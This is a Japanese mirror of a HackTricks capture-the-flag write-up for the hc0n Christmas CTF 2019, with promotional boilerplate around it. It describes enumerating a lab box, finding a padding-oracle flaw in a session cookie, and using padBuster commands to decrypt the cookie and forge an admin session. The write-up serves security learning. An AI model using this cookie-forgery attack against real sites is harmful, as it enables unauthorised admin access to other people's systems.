mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
4.8 KiB
4.8 KiB
hc0n クリスマス CTF - 2019
☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricks で会社を宣伝してみたいですか?または、PEASS の最新バージョンにアクセスしたり、HackTricks を PDF でダウンロードしたいですか?SUBSCRIPTION PLANS をチェックしてください!
- The PEASS Family を発見し、独占的な NFTs のコレクションを見つけてください
- 公式の PEASS & HackTricks スワッグ を手に入れましょう
- 💬 Discord グループに参加するか、telegram グループに参加するか、Twitterで**🐦@carlospolopm をフォロー**してください。
- ハッキングトリックを共有するために、hacktricks リポジトリ と hacktricks-cloud リポジトリ に PR を提出してください。
列挙
私はツール Legionを使用してマシンを列挙し始めました:
2 つのポートが開いています: 80 (HTTP) と 22 (SSH)
Web ページでは新しいユーザーを登録することができ、クッキーの長さが指定されたユーザー名の長さに依存することに気づきました:
そして、クッキーのいくつかのバイトを変更すると、このエラーが表示されます:
この情報とパディングオラクル脆弱性の読み取りにより、それを悪用することができました:
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
ユーザーadminを設定します:
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝してみたいですか?または、PEASSの最新バージョンにアクセスしたいですか?または、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つけてください
- 公式PEASS&HackTricks swagを手に入れましょう
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitterで🐦@carlospolopmをフォローしてください。
- **hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出して、あなたのハッキングトリックを共有してください。